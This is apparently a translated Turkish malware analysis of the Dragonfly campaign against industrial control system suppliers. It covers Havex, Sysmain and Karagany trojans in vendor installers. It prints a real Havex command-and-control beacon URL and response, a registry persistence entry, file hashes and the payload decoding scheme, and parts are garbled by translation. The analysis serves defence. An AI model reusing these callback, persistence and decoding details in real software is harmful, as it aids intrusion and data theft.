Kısım B – Malware Analizi
Saldırı Vektörleri
Dragonfly kampanyası , çeşitli Trojan kötü amaçlı yazılım programları yerleştirerek hedeflerininin gizliliğini ihlal etmiş saldırı vektörlerinden oluşuyordu. Bunların hepsi indirilen veri yüklerinin tutarlı bir dizisinin dağıtımını yönetilen komut ve kontrol (C2 command and control) altyapısı ile koordine etme kabiliyetine sahiptirler.
C2 altyapısı kampanya süresi boyunca veri yüklerini arttırmak ve genişletmek için Dragonfly’e izin verdi. Bu taktik Dragonfly’ın organizasyonun çeşitli sevilerindeki hedefleri etkilemesi için fırsat veren Derinlemesine bir Hücum formu sağladı.
Spear E-Dolandırıcılık Saldırıları
Symantec’in bildirdiğine göre, the Dragonfly kampanyası 11 Şubat ile 19 Haziran 20134 arasında meydana gelen bir dizi email spear kimlik avı saldırıları ile başladı. Bu ilk aşama yedi hedef firmadaki 37 seçilmiş yönetici ve üst düzey çalışanlara gönderilmiş kötü niyetli bir Adobe XML Data Package (XDP) dosyası kullandı. Konu satırı doğal olarak “ hesap” ve “teslimat sorununu çözme” yi kapsayan idari konulardı. Bu hedefler belki direkt olarak endüstriyel kontrol operasyonlarını kapsamıyordu, bu yüzden ICS ile ilgili sonuçları saldırının bu aşaması süresince muhtemel değildi. Dragonfly tarafından kullanılan XDP dosyası Havex taşınabilir yürütülebilir dinamik bağlantı kitaplığına (PE-DLL) deşifre edilmek, indirilmek ve çalıştırılmak için imkan veren PDF / SWF istismarından (CVE-2011-0611) yararlandı. XDP formatı, PDF dosyasını saklayarak ve mağdurların bilgisayarlarında kurulmuş herhangi bir malware koruma yazılımını bazı seviyede algılama ve korunma sunarak bir PDF dosyasının bir XML barındırıcısında konumlanmasına olanak verir.
Kaspersky tarafından analiz edilen veri XDP’nin Havex DLL nin 038 sürümüne düştüğünü belirledi. Ancak, bir Şekil 1’deki çizelge değerlendirilirse , v038 ‘in tahmini derleme tarihi spear phishing aşaması bittikten çok sonra Ekim 2013 olduğu için bu zor görünüyor.
Havex sürümünün bu süreç boyunca v030 dan dahabüyük olmaması daha büyük bir ihtimal. Toplam enfeksiyonların yüzde kırkından daha fazlası hesaplandığında Havex v024 en yaygın kullanılanıydı.
Havex sürümlerini bilmek önemlidir çünkü o erken aşamalarında saldırganların planları ile ilgili bize biraz fikir verir. v024 ile başlayarak, Havex’in onun işleyicileri ile iletişim kurmak için kullandığı HTTP isteği dizesine ilave parametreler eklenmiştir.
“v1” parametresi Havex downloader sürümünü belirtmek için eklendi ve “v2” mağdurun işletim sistemi sürümünü belirtmek için eklendi. v029da , “q” parametresi ayrıca ilk enfeksiyon yöntemini belirtmek için eklendi . Bu revizyonlar ilk aşamalarda bile önerilir, Dragonfly takımı bu kampanyanın sonraki evreleri için çeşitli saldırı vektörlerini yaymayı planlıyordu.
Watering Hole Saldırıları
Sonraki aşama Mayıs 2013in ortalarından Nisan 2014ün başlarına kadar 11 ay çalışan watering hole evresidir. Gizliliği ihlal edilmiş sitelere herhangi bir ziyaretçiyi başka sitelere yönlendiren kötü niyetli bir IFRAME yüklenmiş. Bu istismar edilen siteler başlangıçta LightsOut istismar kiti (LOEK ) içeriyordu. 1 Ekim 2013 den itibaren, Dragonfly Hello exploit kit olarak bilinen bu kitin yükseltilmiş sürümünü kullanmaya başladı.
Dragonfly takımı WordPress, Drupal ve Joomla gibi açık kaynak yönetim sistemlerine dayanarak websitelerinin gizliliğini ihlal etti. Yönlendirilen siteler birçok Java (CVE-2012-1723, CVE-2013- 2465) ve Internet Explorerın(CVE-2012-4792 ve CVE-2013-1347) zayıf noktalarını istismar etmiş kötü amaçlı Java arşivi (JAR) ve HTML dosyaları barındırır. Bu istismarlar sonra websitenin “ziyaretçi” bilgisayarlarına ya Havex yada Karagany paketlerini yüklemek ve çalıştırmak ister.
Symantec’e göre ,bu aşama tablo da gösterildiği gibi üç endüstriyel hizmet sektöründe 20 kadar websitenin gizliliğini ihlal etmeyi kapsar. Ancak, hedef alınan sitelerin yorumu Symantec tarafından kullanılan “enerji kontrol sistemleri” şartının doğru olmadığını ortaya koydu. Altı siteden biri dışında hepsi gerçekte kontrol sistem entegretörlerine aitti ve sadece biri ICS komponentleri üreticisiydi. Entegretörlerden bazıları herhangi bir şekilde enerji sektörü otomasyon çözümleri ile uyumlu bile değil.
| Sanayi | Sitelerin sayısı |
| Enerji | 10 |
| Enerji Kontrol Sistemleri | 6 |
| Dosya Barındırma Hizmeti | 3 |
| Tanımlanamayan | 1 |
Gizliliği ihlal edilmiş sitelerin türlerine göre, bu siteleri ziyaret edenler belkide direkt olarak ICS ye karışan son kullanıcılar değillerdi. Bunun yerine, onlar belkide bölüm A da anlatıldığı gibi kasıtlı hedefler için tedarikçiler yada OEMlerdi.
Truva atı bulaşmış Yazılım Yükleme Saldırıları
Dragonfly kampanyasında üçüncü ve en ilginç ventör üç farklı ICS tedarikçisi gizliliği ihlal edilmiş destek web sitelerine sahipken başladı. Bu saldırganlar bu sitelerde kötü amaçlı komponentleri eklemiş olan yazılım ile yasal kurulumlu yazılımları başarılı bir şekilde yer değiştirebilirdi.
Sonuç olarak, daha önceki vektörleri kullanarak ( spear kimlik avı ve watering holes) Dragonfly’ın amaçlarına hizmet eden aynı kötü amaçlı içerik şimdi güvenilir bir kaynaktan elde edildiğinden ICS dünyasının çoğunun “güvenli” olarak düşündüğü bir yazılım paketinde toplanmıştır.
Genellikle internetten “bağlantısız” olan PLCler ve SCADA RTUlar gibi ekipmanın sıklıkla daha genel sosyal mühendislik vektörleri kullanan saldırılardan etkilenmediğine inanılır. Bu saldırı ICS ekipmanları gibi ulaşılması zor uç noktalara doğrudan kötü niyetli veri yüklerini yaymak için güvenli tedarik zinciri sağlayıcılarını içeren taktikleri kullanma potensiyelini gösterdi.
Bu yazıda Bölüm A’da tartışıldığı gibi, websitelerinin gizliliği ihlal edilmiş ve yasal yazılımları Dragonfly kötü amaçlı yazılımını içeren sürümü ile değiştirilmiş ICS ürününlerinin üç tedarikçisi vardı:
- Endüstriyel kamera üreticisi Mesa Imaging Haziran 2013 de sitesinin gizliliği ihlal edilen ilk firmaydı. O bunu 6 hafta boyunca farketmedi ve yazılımı değiştirmedi.
- Diğer site eWON ‘a aitti– endüstriyel güvenlik cihazları ve uzaktan erişim portalı yazılımı üreticisi Onların sitesinin gizliliği 2014ün Ocak ayı başında 10 gün boyunca ihlal edildi ve kötü amaçlı yazılımlardan yaklaşık 250 kopya indirildi.
- Son site eWONa benzer şekilde bir dizi donanım ve yazılım güvenlik cihazları da üreten MB Connect Line e aitti. Bu site tahminen 2014 yılının Nisan ayı başında iki haftalık bir süre için kötü amaçlı yazılım barındırdı. Mesa Imaging ve MB Connect Line sitelerinden yapılan indirme sayıları ile alakalı hiçbir bilgi açığa vurulmadı.
Analiz edilen içerikler eWON yükleyicisinin Havex’in v038 ve MB Connect Line’nın Havex v043 içerdiğini ortaya koymaktadır. Mesa Imaging yükleyicileri Sysmain olarak bilinen farklı bir Trojan kullandı. Kaspersky verisi 286 mağdurun v038 ve 388 mağdurun v043 aldığını belirtiyor. Kötü niyetli eWON indirmesinin 250 kopyası arasında bağlantı kurulduğunda, v038 kurbanların çoğunun eWON vektörü aracılığıyla kötü amaçlı yazılımı almış olması muhtemeldir. Havex v043 uygulanan aynı mantık tahmini 350 mağdurun7 MB Connect Line vektörü aracılığıyla kötü amaçlı yazılım aldığına işaret edebilir.
Bu indirmelerin her birinde toplanmış olan ayrıntılar kısaca ele alınacaktır.
Yukardaki tabloda Sites Compromised During Watering Hole Attack Phase as per Symantec’e göre Watering Hole Saldırı Evresi boyunca gizliliği ihlal edilen siteler . Araştırmamız “Enerji Kontrol Sistemleri” açıklamasının yanlış olduğunu göstermektedir.
Malware Detayları
Genel Dragonfly kampanyası çeşitli hedeflere uygulanmış siber silahlar deposundan oluşur. Bu yazı sadece bileşenlerin bir kısmını anlatır. Kötü amaçlı yazılım bileşenlerindeki her türlü detay Kaspersky raporunda bulunabilir.
Havex
Dragonfly kampanyasında kullanılan ilk komponent Backdoor olarak da anılan Havex uzaktan erişim aracıydı (RAT). Bu modülün asıl amacı hedef üzerinde süreklilik oluşturmak ve sonra indirmek ve ek modüller çalıştırmak için C2 sunucuları ile haberleşmektir.
Havex Dragonfly kampanyasında en yaygın kullanılan komponenttir ve 50 kadar farklı varyasyon kullanarak yaklaşık 2,470 mağduru etkilemiştir.Tablo 3 ek Havex enfeksiyonunun ayrıntılarını göstermektedir. Havex revizyon numaralarının onaltılık biçimde belirtilmiş olduğunu unutmayın.
RATın yüklendiği ve kullanıldığı mekanizma aşağıdaki gibidir. İlkinde başlangıç olayı mağdur tarafından tetiklendi; ya gizliliği ihlal edilmiş web sitesini ziyaret ederken yada truva atı bulaşmış programı indiriken virüs bulaşmış bir dosyayı açarak.
Sonrasında, RAT yazılım kurbanın bilgisayarına yüklendi. Kurulduktan sonra, malware 80/tcp portunu kullanarak http aracılığyla C2 sunucusunda bir istek başlattı . Giden ileti hedef C2 sunucusunda bir PHP komut dosyası için bir GET (eski sürümlerde) yada POST isteğinden oluşurdu.Bu ileti kurban parametrelerinin bir başlangıç ayarını da kapsardı:
- Mağdur tanımlama
- Havex sürüm numarası
- İşletim sistemi sürümü (ondalık biçimde)
- Bulaşma yöntemi
Etkin bir C2 bağlantısı kurulduktan sonra , GET / POST isteği yanıtı tarafından doğrulandığı gibi, çeşitli modüller C2 sunucularının yanıt iletisinde saklandı. Bunlar eşsiz Havex yorum etiketleri <!–havex (şifreli kod) havex–> arasında bulundu.Tipik bir POST talebi ve karşılık gelen yanıtın (Gizlenmiş) bir örneği aşağıda yer almaktadır.
POST talebinde kurbanın tanımlayıcı (id) ,Havex sürüm numarasının (v1), OS sürümünün (v2) ve yükleyicinin (q) olduğuna dikkat ediniz.
Mağdurdan C2 sunucusuna POST talebi:
http://rapidecharge.gigfa.com /blogs/wp-content/plugins /buddypress/bp-settings/bp-settings-src.php?id=185545342 88436177420090FD80-c8a7af419 640516616c342b13efab&v1=043&v2= 170393861&q=45474bca5c3a10c8e94 e56543c2bd
C2 sunucusundan mağdura yazılım modülü ile cevap:
<html><head><mega http-equiv=’CACHE-CONTROL’ content=’NO-CACHE’></ head><body>No data!<!– havexQlpoOTFBWS<additional data removed>lIwg==havex–></ body></head>
Yüklenen dosyalar, indirilen modüller ve veri toplama açısından truva atı bulaşmış benzersiz yazılım komponentlerinin her birinin altında ayrıntılı olarak ele alınacaktır.
Sysmain
Sysmain komponentinden Symantec raporunda bahsedilmedi fakat Kaspersky tarafından analiz edildi. Bu malware süreklilik kazanadıktan sonra mağdurun bilgilerini kontrol etmek ,onlarla etkileşmek ve ayıklamak için çeşitli işlevler sağlayan RAT’ın diğer bir şeklidir.
Dört statik C2 sunucu adresleri sunucuların kendi ayarına sahip olan her bir varyant ile kötü amaçlı yazılım içine kodlanmış. Bu çalışmada analiz edilen C2 sunucularından hiçbiri bu zamanda aktif değil:
Onbir komut aşağıdakileri yapabilmek için Sysmain RAT içinde bulunmuştur:
- Shell komutları çalıştırmak
- Saldırganın C2 sunucusu tarafından gönderilmiş olabilen ilave çalıştırılabilir dosyaları ve kütüphaneleri başlatmak.
- Kurbanın dosya sistemini incelemek
- Kurbanın bilgisayarından isteğe bağlı dosyaları toplamak
Sysmain da C2 haberleşmesi sırasında asimetrik şifreleme için kullanılan sabit kodlanmış kamu anahtarını değiştirmek ve tamamlandığında, Windows kayıt defterinden varlığının izlerini kaldırma yeteneğine sahiptir.
Sysmain ‘ın kapmanya genelinde nasıl yoğun bir şekilde kullanıldığı ile alaklı çok az bilgi var.
Sysmain kullanılan bu çalışmada analiz edilen tek malware bu komponentin Dragonfly kampanyasının belkide sadece başlarından kullanıldığını belirleyen truva atı bulaşmış Mesa Imaging sürücü yazılımında bulunmuştu.
Karagany
Karagany siber keşif faaliyetleri için geçmişte kullanılan bir backdoordur. Bu taktikten ilk Cisco Blogunda “ Watering-Hole Saldırıları Hedef Enerji Sektörü”15 Eylül 2013 de söz edilmiştir.
Daha önce de belirtilen modüller gibi, Karagany dosya yükleme, indirme ve yürütülmesi için benzer yeteneklere sahip; kendini güncellemek için bakım fonksiyonları;ve hedeften kendini temiz bir şekilde kaldırma yeteneği . Onun şifresiz HTTP oturumları üzerinden gönderilen temel kimlik doğrulama bilgilerini ayıklamak için WSASendi izleyen ve APIler gönderen küçük, gizli DLL dosyası da vardır.
Karagany modüllerden biri hedefteki ekran görüntüleri alma ve onları bir C2 sunucusuna yükleme yeteneği sağladı. Bahsetmeye değer başka bir modül belirli adları veya uzantıları içeren dosyaları listelemek ve C2 sunucusuna bu dosyaları yüklemek için kullanıldı. Arama modülünün içerdiği ilginç dizelerden bazıları Tablo 4’de verilmiştir.
Karagany RAT, bu çalışma için analiz edilen herhangi bir malwarede görülmedi, sadece Dragonfly kampanyası boyunca toplam bulaştımanın yüzde 3-5 inde görüldü.
Truva atı bulaşmış Yazılım İçerik
Çalışmanın bu bölümü gizliliği ihlal edilmiş ICS ile ilgili üç web siteden elde edilen beş malware örneğinin dördünün detaylı analizini sağlar. Burada tartışılan sonuçların Dragonfly kampanyasının genelinde kullanılmış toplam varyantların sadece az bir miktarını içeren özel malware örneklerinin olduğunu hatırlamak gerekir.
Tablo 5 tedarikçi web sitelerinin her birine truva atı bulaşmış olan ve bu yazıda analiz edilen yazılımın detaylarını içerir.
Numunelerin analizi güvenlik duvarı korumalı Internet erişimi (C2 haberleşmesini kurmak için gerekli ) olan izole bir ağ üzerinde gerçekleştirildi.
Güvenlik duvarı vasıtasıyla sadece HTTP (80/tcp), HTTPS (443/tcp) ve DNS (53/tcp) trafiğine izin verildi.
Test ağdaki cihazların sayısı değişmişti, ama her zaman çeşitli OPC istemci ve sunucu bileşenleri ile yüklenen en az iki Windows hostunu içerirdi. Bileşenler DCOM kimlik doğrulaması için ortak bir yerel Windows hesabı mekanizması kullanırdı.
Çoklu PLC’ler da kötü amaçlı yazılıma ilginç hedefler sunmak için ağa eklenmişti. Bunlar onların ilgili mühendislik araçlarının (ör RSLinx, Aşama 7, vs.) yanı sıra Modbus/TCP, EtherNet/ IP, ve Siemens S7-Comms gibi genel endüstriyel protokolleri kullanır.
Sistem bir süre için enfekte olduktan sonra sisteme girebilecek veri yükleri olsaydı bulaştırma testlerinin tanımlamak için 24 saati aşan bir süre boyunca yürütülmesine izin verildi. Bir test ilk bulaşmadan sonra daha iyi kurulabilen herhangi bir gizli modülü daha iyi çalıştırmak için yedi günlük bir süre boyunca çalıştırıldı.
Çalışan tüm testler 3. etapta OPC tarayıcı modülünden sonra indirilen hiç bir ek içerik ile benzer sonuçlar vermemiştir. Bu bilgi ortak sanayi protokollerin varlığını taramak isteyen dördüncü bir modülü tanımlayan Kaspersky raporu ile çelişiyor. Bu varyant VirusTotal’de yoktu ve doğrulanamadı.
Truva atı bulaşmış Mesa Imaging Yazılımı
Truva atı bulaşmış Mesa Imaging yazılımı uygun görüntüleme yazılımlı kameralarınapmak için kullanılan bir dizi sürücüden (libMesaSR version 1.0.14.706) oluşmuştu. Mesa Imaging Windows ve Linux işletim sistemleri için kendi sürücülerinin hem 32-bit hem de 64-bit sürümünü sunmaktadır. Bu sürücüler herhangi bir kayıt yada yetki olmadan onların http websitelerinden doğrudan indirilebilir.
Dragonfly yanlızca Windows 32-bit sürümü ile uzlaşma girişiminde bulundu.Bu amaçlanan hedeflerin saldırının gelecekteki aşamalarını kolaylaştırmak için muhtelemen yama yapılmamış ( hem Windows işletim sistemi hemde üçüncü parti uygulamalar açısından ) Windows XP ana bilgisayarları olduğunu ortaya koyuyor.
Başarılı bir şekilde yüklenebilmesi için,tüm Mesa Imaging sürücüleri yönetici ayrıcalıklarını kullanan bir Windows hesabına ihtiyaç duyarlar. Şaşırtıcı bir şekilde, meşru yazılım yüklemede başarısız olurken , kötü niyetli bileşenler başarılı şekilde yüklenebiliyor hatta hesap kontrollerine bakılmaksızın çalıştırılabiliyordu. Bu yetkisiz kod yürütülmesini gerçekleştirmek için kötü amaçlı yazılımın önemli bir yeteneği olduğunu gösteriyor. O kullancının ayrıcalıklarına bakılmaksızın gelecek saldırılarda hesapları istismar etmek için kullanılabilirdi.
Maalesef , Bu özel varyant Sysmain RAT’a dayalıydı ve herhangi bir C2 haberleşmesi başlatmak için girişimde bulunmadı – aslında, hiçbir çıkış ağ trafiği gözlenmedi– bu nedenle bu truva atı bulaşmış özel yazılım ile ilgili çok az bilgi mevcuttur. Bu Stuxnet gibi ICS malware’inde daha önce birşeyin görüldüğü tarihten sonra onun çalışmasını devre dışı bırakarak malwaredeki “ sonlandırma tarihinin” varlığını belirtebilir.
Kullanıcı enfekte Mesa Imaging yazılımının kurulum uygulamasını başlatır başlatmaz, kötü amaçlı yazılım mevcut kullanıcının% TEMP% dizine, Sysmain yükleyici modülü ile birlikte kendini kopyaladı. Sysmain modülü “gizli” nitelik ayarı ile tmp687.dll olarak kopyalanırken orijinal yükleyici setup.exe olarak kopyalanmıştır.
Gelecekteki sistem yeniden başlatmalarında süreklilik oluşturmak için malware Sysmain modülünü lokal kullanıcının %APPDATA% rehberine kopyaladı ve başlangıç komutunu çalıştırmak için Windows kayıt defterine bir giriş oluşturuldu .
HKCU\Software\Microsoft\ Windows\CurrentVersion\Run load (REG_SZ): %SYSTEM32%\rundll32. exe “%APPDATA%\sydmain. dll”,AGTwLoad
Dosya detayları aşağıda verilmiştir:
| Dosya adı: | SwissrangerSetup1.0.14.706.exe | ||
| MD5: | e027d4395d9ac9cc980d6a91122d2d83 | ||
| SHA-1: | b3e3d9d8779c51f637401f5dee4fcf016acc8038 | ||
| SHA-256: | 398a69b8be2ea2b4a6ed23a55459e0469f657e6c7703871f63da63fb04cefe90 | ||
| Initial Droppers: | %TEMP%\tmp687.dll | ||
| İlave dosyalar: | %TEMP%\setup.exe | ||
| Kalıcı Dosyalar: | %APPDATA%\sydmain.dll | Admin Privileges | |
| %APPDATA%\sydmain.dll | Kullanıcı Ayrıcalıkları | ||
Bu çalışma yayınlandığında Mesa Imaging’in mevcut sürücüsü 1.0.14.747 sürümüydü.
Truva atı bulaşmış eWON Yazılımı
eWON yazılımı Havex RAT modülünü dahil etmek için ICS ile ilgili websitesine virüs bulaşanların ilkiydi. İki farklı yazılım uygulaması hedef alındı ve maalesef bu analiz için sadece biri mevcuttu.
İlk komponent Talk2M cözümüne dayalı internet bazlı,isteğe bağlı uzaktan erişim (eCatcher sürüm 4.0.0) için eWON uygulamasıdır. İkinci uygulama eFive sürekli uzaktan erişim çözümü ile kullanılan VPN alıcısıdır (eGrabit sürüm 3.0 Build 82).
Her iki virüs bulaşmış yazılım komponenti de herhangi bir kayıt yada yetki gerektirmeden onların HTTP websitelerinden doğrudan indirilebilir.
Grabit uygulaması başarılı bir şekilde yüklemek için yönetici ayrıcalıklarına sahip bir hesap gerektirir. Mesa Imaging uygulamasına benzer şekilde, virüs bulaşmış içerik başarılı şekilde indirilebilir ve hatta yasal uygulamalar sınırlı hesap kullanarak indirilemese bile çalıştırılabilirdi.
Mesa Imaging testleri gibi, yükleme yapıldıktan sonra C2 haberleşmesini başlatma girişiminde bulunmadı. Aslında, hiçbir çıkış ağı trafiği gözlenmedi ,bu yüzden bu özel kötü amaçlı yazılım paketi ile ilgili çok az bilgi var. Yüksek ihtimalle bu kötü amaçlı yazılım kullanım süresini sınırlayan kodlanmış bir sonlandırma tarihine sahipti. Bu, saldırganın son ICS hedefleri ile ilgili onların kampanyasının hala “gelişim” aşamasında olduğuna işaret edebilir.
Kullanıcı kurulum uygulamasını başlatır başlatmaz , kötü amaçlı yazılım kendini mevcut kullanıcının %TEMP% rehberine Havex yükleyici modulü aracılığı ile kopyaladı.Havex modulü hem EXE hemde DLL dosyasında “gizli” nitelik ayarı ile TmProvider.dll olarak kopyalanırken orjinal yükleyici egrabitsetup.exe olarak kopyalandı. Küçük ilave ek dosyası qln.dbx da Havex sürüm numarasını (38 bu durumda) kapsayarak oluştuldu.
Sistem yeniden başlatmadan sonra sürekliliği oluşturmak için, kötü amaçlı yazılım mavcut kullanıcının yetki seviyesine bağlı olarak iki rehberden birine Havex modulünü kopyaladı.
Yönetici ayrıcalıklarına sahip kullanıcılar için, dosya %SYSTEM32% rehberine yerleştirildi ; ayrıca dosya %ALLUSERAPPDATA% rehberine yüklendi. Başlangıç komutunu çalıştırmak için uyumlu bir giriş Windows Kayıt Defterinde oluşturuldu.
eWON tüm müşterine eCatcher yazılımın sürümünü 4.1e yükseltmelerini tavsiye ederek 30 Ocak 2014 de web sitesi aracılığla bir güvenlik olayı raporu yayınladı. Bu sürümün özellikleri Havex kötü amaçlı yazılımının izlerini otomatik olarak siler.
eWON 3 Temmuz 2014 de orijinal rapora bir güncelleme yayımladı. EGrabit uygulamasının durumu ile ilgili satıcıdan benzer bir bildirim olmamıştır, ancak mevcut yazılım sürüm, yeni “şifre uygulama” özellikleri ve güvenlik geliştirmelerine odaklanmanın tartışıldığı eWON basın açıklamasındaki 3.1. Detaylarıdır. Symantec ve Kaspersky raporları virüs bulaşmış eGrabit yazılımından bahsetmiyor.
Truva atı bulaşmış MB Connect Line Yazılımı
MB Connect Line yazılımı Dragonfly kampanyasında istismar edilen en son yazılımdır. eWON olayındaki gibi , saldırganlar firmanın üretim bandının iki farklı komponentini hedef aldılar.
İlk virüs bulaşan yazılımı (mbCHECK version 1.1.1.0) mbCONNECT24 uzaktan erişim çözümünün bulut tabanlı veya ana sunucular için şifreli bağlantıları doğrulama ve güvenliği teşhis etmek için kullanıldı.İkinci paket yükleme dosyası (setup_1.0.1.exe) ve bir PDF belgesi içeren ZIP arşivinin bir bölümünü olarak indirilmiş bir konfigürasyon aracından (mbCONFTOOL sürüm 1.0.1.0) oluşuyordu. Bu paket endüstriyel güvenlik aletlerinin mbNET hattı için ilk ağ ayarlarını yapılandırmada kullanılmıştır.
Bu ürün, Siemens’in İlk Kurulum Aracına (PST) benzer, ve genelde sadece yerel ağ aracılığıyla güvenlik uygulamalı ilk bağlantıyı kurmak için kullanılır. MbNET cihazın sonraki detaylı yapılandırması (seri arabirim, VPN ayarları, anahtar yükleme, vb) standart bir Internet Web tarayıcısı kullanarak dahili bir yerel Web sunucusu ile cihaz üzerinde doğrudan oluşur.
Her ikisi virüs bulaşmış yazılım bileşeni de indirme yapabilmek için sadece bir kullanıcı tarafından önemsiz bir web tescil prosedürüne ihtiyaç duyar. Kullanıcı kayıt olduğunda, MB Connect HTTP sitesinden doğrudan indirme linklerini sağlamak için email gönderildi- başka bir kimlik doğrulamasına ihtiyaç yoktu.
mbCHECK tanı aracını çalıştırmak için özel ayrıcalıklar gerekmez, ve kısıtlı bir Windows kullanıcısı olarak çalıştırılabilir. mbCONFTOOL kurulum uygulaması başarıyla yüklenmek için yönetici ayrıcalıklarına sahip bir hesap gerektirir.
Mesa Imaging ve eWON uygulamalarına benzer şekilde, mbCONFTOOL uygulaması kısıtlı bir hesap kullanılarak yüklenemese bile virüslü içerik başarıyla yüklenebilir ve çalıştırılabilirdi. Malware başarıyla yüklenir yüklenmez, kullanıcı hesabı ayrılacaklıklarına bakılmaksızın indirilmiş modülleri alan ve bu modülleri çalıştıran bir C2 haberleşmesi kurdu.
Kullanıcı kurulum uygulamasını başlattıktan sonra malware mevcut kullanıcının %TEMP% dizinine Havex yükleyici modülü vasıtasıyla kendini kopyaladı. Havex modülü hem EXE hemde DLL dosyalarında “gizli” nitelik kurulumu ile mbCHECK. dll veya setup_1.0.1.dll ( yükleme kaynağına bağlı olarak) olarak kopyalanırken orijinal yükleyici mbCHECK.exe veya setup_1.0.1.exe olarak kopyalandı. Havex sürüm numarasını ( bu durumda 43) içeren küçük ilave bir metin dosyası qln.dbx oluşturuldu.
Sistem yeniden başlatmadan sonra süreklilik oluşturmak için , malware mevcut kullanıcının yetki seviyesine bağlı olarak iki dizinden birine Havex modülünü kopyaladı. Yönetici ayrıcalıklarına sahip kullanıcılar için, dosya% SYSTEM32% dizininde yerleştirildi; ayrıca dosya% ALLUSERAPPDATA% dizinine kuruldu . Windows Kayıt Dizinine başlangıç komutunu çalıştırmak için uyumlu bir giriş oluşturuldu.
MB Connect Line, bu çalışma yayınlandığında, mbCHECK sürüm 1.1.2.i sunar. mbCONFTOOL araç uygulaması hala 1.0.1. sürümünde, ancak bu analiz yapılırken, zararlı içeriğin kaldırıldı ortaya çıktı.
Malware Komut ve Kontrol
C2 sitelerinin malware özel sürümü içine kodlanmış olduğu görünmektedir. Verilen malware örnekleri kullanan onlarca yazılım yüklemesi analizinde , sınırlı sayıda site kullanılması site seçiminin rastgele olduğunu ortaya koydu. Malware geçerli bir C2 sitesi keşfedilene kadar bağlantılara katılmaya devam etti.
Gözlemlenen siteler Tablo 6 da listelenmiştir. Işaretli olanlar URL’lerin (*) C2 sitesi olarak artık işlevi olmadığını gösteriyor. Aşağıda gösterildiği gibi PHP komut dosyaları hala Havex içeriği ile cevap verdiğinden aktif olmayan sitelerinin C2 altyapısı temizlenmişe benzemiyor ( Havex kelimesi içeren yorum etiketinin varlığına dikkat edin).
<html><head><mega http-equiv=’CACHE-CONTROL’ content=’NO-CACHE’></ head><body>Sorry, no data corresponding your request.<!- -havexhavex–></body></html>
Ek URL’ler Kaspersky raporun eklerinde bulunabilir.
Veri yükleri
Dragonfly saldırı dizisinin en ilginç yönü C2 sunucularından güncellenmiş yazılım modüllerini ve talimatları almak için kötü amaçlı yazılım yeteneğinin olmasıydı. C2 sunucularının çoğu artık saldırganlar tarafından “yönetilmiyor” , yani içerik Haziran 2014teki saldırının sona ermesinden bu yana çok değişmemiştir.
Bazı sunucular hala virüslü bilgisayarlara modülleri indirebilir, bu nedenle bunlar değerlendirilebilir. İlgili modüller zaten tartışılan truva atı bulaşmış uygulamalardan biri vasıtasıyla taban RAT kurulumu bağlamında Tablo 6’da ayrıntılı olarak verilmiştir.
Daha önce belirtildiği gibi, enfeksiyon süreci tutarlıdır. Kullanıcı ilk damlalık dosyalarını içeren kurulum uygulaması başlatır başlatmaz, malware ilgili dizinlere dosyaları kopyalar ve Windows kayıt defterinde uygun girdileri yapar. Daha sonra sabit kodlanmış C2 URL’lerden herhangi biri ile iletişim kurmayı deneyen çok programlı bir süreç başlar.
Bu haberleşme süreci 24 dakikada bir sabit aralıkta tekrar eder Başarılı bir haberleşme gerçekleştirilir ise, üç farklı C2 URL olarak görünenlerden birini kullanarak tekrar deneyeceği zaman malware 24 dakikalık süre boyunca pasif kalır. Bu biribirini izleyen girişimlerde aynı cevap vermeyen URL kullanabileceğinden ,Malware hangisini kullanacağını rastgele seçer.
Şekil 4 ana bilgisayar ve C2 sunucuları arasındaki interaktif bir oturum sırasında gerçek PCAPden çıkarılan veri yüklerini gösterir. Çıktı kötü amaçlı yazılımın ilave veri yükleri ve talimatları almak için çoklu C2 sunucularına nasıl bağlandığını göstermektedir. İlk bağlantı girişimi (ref packet 37) cevap vermeyen bir siteyi adresledi.Vurgulanan üç indirme listelenen yük modülleri ile uyumlu URL’ler sayesinde oluştu.
Havex Sürekliliği ve Mühendislik Laptopları
C2 sunucuları ile haberleşme süreci hiç sonlanmış görünmüyor. Bu hem güvenli (yani, hiçbir kamu ağ erişimi)hem de güvensiz (genel ağ erişimi mevcuttur) ortamlarda bilgisayarların kullanımı ile ilgili ciddi bir güvenlik sorununu ortaya koyuyor. Bir ICS PCS halka açık bir ağda kullanıldığı ve virüs bulaştığında,malware o “güvenli” bir ICS ortamına taşındıktan sonra da aktif olmaya devam edecektir.
Hem izole endüstriyel ağlarda ekipman bakımını gerçekleştirmek için kullanılan ve aynı zamanda ofis ağlarında da standart iş faaliyetleri gerçekleştirmek için kullanılan bir mühendislik laptopuna virüs bulaşmış uygulamalardan birinin yüklü olduğu bir durumu düşünün. Kötü amaçlı yazılım kurbanın bilgisayarlarına kalıcı olarak yüklendikten sonra , güvenli ağ içindeyken başlangıçta C2 sunucuları ile haberleşmeyi kurmayabilir.Ancak kötü amaçlı yazılım bilgisayar her yeniden başlatıldığında başlamaya devam edeceğinden, bilgisayarın halka açık internet bağlantısı ile C2 sunucularına bağlamayı sağlayan bir ağdaki bazı noktalara bağlanması gibi iyi bir şans vardır.
Kötü amaçlı yazılımın yürütme gerçekleştiğinde yerel veri depoları oluşturma, ve sonra bu dosyaları sonraki bir zamanda C2 ye transfer etme yeteneği hassas bilgilerin (kullanıcı kimlik bilgileri, VPN yapılandırma dosyaları,vb. gibi) potensiyel olarak saldırganlara aktarılmasına olanak verir.
Havex Modulü Transfer Süreci
Havex modüllerinin her biri RAT tarafından oluşturulan HTTP POST taleplerinin bir sonucu olarak C2 sunucusundan aldığı cevapları içerirdi. Bu cevaplar özellikle işaretlenmiş yorum etiketleri arasında HTTP metninde yer alan şifrelenmiş veriyi içerir.
Kötü amaçlı yazılım sonra bu içeriği çalıştırdı ve onu bir yerel dosya olan %TEMP%\[seq_ no].xmd dosyasına koydu.Bu dosya deşifre edildi (base64 encode),sıkıştırılmışı açıldı (bzip2 sıkıştırma ), şifresi çözüldü (XORed with “1312312”) ve orjinal .xmd dosyası silindikten sonra PEDLL file %TEMP%\[seq_ no].tmp.dll geçici dosyası olarak kaydedildi. Bu DLL dosyası sonra belleğe yüklendi ve çalıştırıldı.
Çoğu modül de , C2 sunucusuna geri gönderilen şifreli verilere sahip olacaktır . Bu, modülün kaynak bölümünde bulunan 1024-bit RSA açık anahtar kullanılarak gerçekleştirildi. Her modül tarafından oluşturulan veriler C2 sunucularına transfer edilmeden önce şifrelenmiş, sıkıştırılmış ve% TEMP% \ [seq_no].yls.içine yazılmıştır .
Her bir .yls dosyası dahili RSA anahtarı kullanarak şifrelenmiş rastgele bir 192-bit anahtar kullanan 3DES algoritması ile şifrelendi.
